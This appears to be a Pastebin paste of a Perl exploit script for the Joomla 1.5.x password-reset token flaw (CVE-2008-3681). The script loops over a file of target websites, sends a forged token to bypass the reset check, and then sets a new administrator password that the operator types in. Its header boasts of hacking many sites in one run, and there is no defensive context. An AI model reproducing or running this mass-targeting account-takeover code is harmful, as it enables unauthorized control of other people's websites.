API tools faq
paste
Advertisement
Aluf

Joomla 1.5.x Remote Adm Change Password

Aluf
Jan 31st, 2015
325
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.42 KB | None | 0 0
raw download clone embed print report
  1. #Exploit Title: Joomla 1.5.x (Token) Remote Admin Change Password Vulnerability (perl)
  2. #Date: 2/05/2014
  3. #Exploit Author: D35m0nd142
  4. #Vendor Homepage: http://www.joomla.org/
  5. #CVE: 2008-3681
  6. # This time you can hack multiple websites by running this script just one time!
  7. # To install File::Slurp --> cpan[1] > force install File::Slurp
  8. # To install Text::Trim --> cpan[1] > install Text::Trim
  9. # To install HTTP::Request --> cpan[1] > force install HTTP::Request
  10. # To install Text::Trim --> cpan[1] > install Text::Trim
  11. # This script picks a list of websites, to hack, from a text file called 'jwebsites.txt'. If this file does not exist or it is blank the script could not work correctly.
  12. # [IMPORTANT] Websites within the file 'jwebsites.txt' MUST be written omitting 'http://'! If this option won't be respected, the script will not work!
  13.  
  14. #!/usr/bin/perl
  15. use LWP::UserAgent;
  16. use HTTP::Request;
  17. use IO::Socket::INET;
  18. use File::Slurp;
  19. use Text::Trim qw(trim);
  20. use Term::ANSIColor;
  21.  
  22. sub show_header
  23. {
  24. local ($tc,$t) = @_ ;
  25. print color 'white'; print "_____________________________________________________________________________________________________\n\n"; print color 'reset';
  26. print "Host: $tc\n";
  27. print "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0\n";
  28. print "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n";
  29. print "Accept-Language: en-US,en;q=0.5\n";
  30. print "Accept-Encoding: gzip, deflate\n";
  31. print "Referer: $t/index.php?option=com_user&view=reset&layout=confirm\n";
  32. print "Connection: keep-alive \n";
  33. print "Content-Type: application/x-www-form-urlencoded\n";
  34. }
  35.  
  36. sub show_error
  37. {
  38. local ($res) = @_ ;
  39. print "[!] Error during the request: \n";
  40. print colored 'red'; print "HTTP POST error code: "; print color 'reset'; print $res->code,"\n";
  41. print colored 'red'; print "HTTP POST error message: "; print color 'reset'; print $res->message, "\n\n";
  42. }
  43.  
  44. system("clear");
  45. print color 'white'; print "-----------------------------------------------------\n";
  46. print color 'red'; print " Joomla 1.5.x (Token) Remote Admin Change Password \n";
  47. print color 'blue'; print " Created by D35m0nd142 \n";
  48. print color 'white'; print "-----------------------------------------------------\n\n";
  49. print color 'reset';
  50. $file = 'jwebsites.txt';
  51. open(MYFILE, $file);
  52. while(<MYFILE>)
  53. {
  54. chomp;
  55. $a = $_ ;
  56. $target = $a;
  57. $agent = LWP::UserAgent->new();
  58. $agent->agent('BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0');
  59.  
  60. if($target !~ /http:\/\//)
  61. {
  62. $target_cut = $target;
  63. $target = "http://$target";
  64. }
  65.  
  66. sleep 1;
  67. print color 'yellow';
  68. print "[+] Website loaded => ";
  69. print color 'reset'; print "$target\n";
  70. sleep 1;
  71. print color 'blue'; print "[*] "; print color 'reset'; print "Testing if $target could be vulnerable ...\n";
  72. sleep 1;
  73. $host = $target."/index.php?option=com_user&view=reset&layout=confirm" ;
  74. $req0 = HTTP::Request->new(GET=>$host);
  75. my $req = $agent->request($req0);
  76. if($req->is_success && $req->content !~ /input id=\"username\" name=\"username\" type=\"text\" class=\"required\"/ && $req->content !~ /Username:/ ) # if also username is present, it means that the website is not vulnerable
  77. {
  78. open(FILE, "> source.txt");
  79. print FILE $req->content;
  80. close(FILE);
  81. $extract = "grep 'value=\"1\"' source.txt > source1.txt && cut -d \"=\" -f 3 source1.txt > source.txt && cut -d '\"' -f 2 source.txt > source1.txt";
  82. system($extract);
  83. $code = read_file('source1.txt');
  84. chomp $code;
  85. trim($code);
  86. print color 'white'; print "[+] "; print color 'reset'; print "Extracted POST code: "; print color 'white'; print "$code\n"; print color 'reset';
  87. $body = "token=%27&$code=1";
  88. $length = length($body);
  89. $body = "$body\r\n\r\n";
  90. sleep 1;
  91. print "[*] Testing if the website is vulnerable ...\n";
  92. sleep 0.3;
  93. print color 'red'; print "[*] "; print color 'reset'; print "Creating HTTP POST request ... \n\n";
  94. sleep 1;
  95. show_header($target_cut, $target);
  96. print "Content-Length: $length\n";
  97. print "\ttoken=%27&$code=1\n";
  98. print color 'white'; print "_____________________________________________________________________________________________________\n"; print color 'reset';
  99. sleep 1;
  100. print color 'red'; print "\n[*] "; print color 'reset'; print "Sending malicious token to $host ...\n\n";
  101. sleep 0.8;
  102. my $ua = LWP::UserAgent->new;
  103. my $server = $host;
  104. my $req = HTTP::Request->new(POST => $server);
  105. $req->header('User-Agent' => 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0');
  106. $req->header('Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8');
  107. $req->header('Accept-Language' => 'en-US,en;q=0.5');
  108. $req->header('Accept-Encoding' => 'gzip, deflate');
  109. $req->header('Connection' => 'keep-alive');
  110. $req->header('Content-Type' => 'application/x-www-form-urlencoded');
  111. $req->header('Content-Length' => 'length($body)');
  112. my $post_data = '{"token": "%27", "$code": "1" }';
  113. #print "$post_data\n";
  114. $req->content($post_data);
  115. my $resp = $ua->request($req);
  116.  
  117. if($resp->is_success)
  118. {
  119. print color 'white'; print "[+] "; print color 'reset'; print "Request sent without errors.\n";
  120. my $message = $resp->decoded_content;
  121. #print "[*] Received reply: $message\n";
  122. open(FILE, "> joutput.html");
  123. print FILE $message;
  124. close(FILE);
  125. if ($message !~ /please paste the token in the field/ && (($message =~ /Password:/ && $message =~ /Verify Password/) or ($message =~ /Senha:/ && $message =~ /Verificar Senha/) or ($message =~ /Password:/ && $message =~ /Conferma Password:/)))
  126. {
  127. print color 'red';
  128. print "\n[+] Exploit works! :) \n";
  129. sleep 1;
  130. print color 'reset';
  131. print "[*] Enter the new admin password for the website --> ";
  132. $newpass = <STDIN>;
  133. if($newpass eq '')
  134. {
  135. sleep 0.3;
  136. print color 'red'; print "[!] "; print color 'reset'; print "You can not insert a blank password little bitch!\n";
  137. exit(1);
  138. }
  139. print color 'red'; print "[*] "; print color 'reset'; print "Creating the second HTTP POST request ... \n";
  140. sleep 1;
  141. show_header($target_cut,$target);
  142. $body = "password1=$newpass&password2=$newpass&$code=1";
  143. $length = length($body);
  144. print "Content-Length: $length\n";
  145. print "$body\n";
  146. print "_____________________________________________________________________________________________________\n";
  147. sleep 1;
  148. my $req1 = HTTP::Request->new(POST => $server);
  149. $req1->header('User-Agent' => 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0');
  150. $req1->header('Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8');
  151. $req1->header('Accept-Language' => 'en-US,en;q=0.5');
  152. $req1->header('Accept-Encoding' => 'gzip, deflate');
  153. $req1->header('Connection' => 'keep-alive');
  154. $req1->header('Content-Type' => 'application/x-www-form-urlencoded');
  155. $req1->header('Content-Length' => '$length');
  156. my $post_data = '{"password1": "$newpass", "password2":"$newpass","$code": "1" }';
  157. #print "$post_data\n";
  158. $req1->content($post_data);
  159. my $resp = $ua->request($req1);
  160. if($resp->is_success)
  161. {
  162. print color 'white'; print "[+] Request sent without errors and password changed.\n"; print color 'reset';
  163. my $message = $resp->decoded_content;
  164. print "[*] Try to login to the administrator panel now :) \n";
  165. print "[*] Enjoy it :) Bye... \n\n!";
  166. }
  167. else
  168. {
  169. show_error($resp);
  170. }
  171. }
  172. else
  173. {
  174. print color 'red'; print "\n[!] "; print color 'reset'; print "Token not bypassed. Website is not vulnerable :( \n\n";
  175. }
  176. }
  177. else
  178. {
  179. show_error($resp);
  180. }
  181. }
  182.  
  183. else
  184. {
  185. print color 'red';
  186. print "[!] "; print color 'reset'; print "The page $host contains also the parameter 'Username', so the website is not vulnerable.\n\n";
  187. }
  188. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!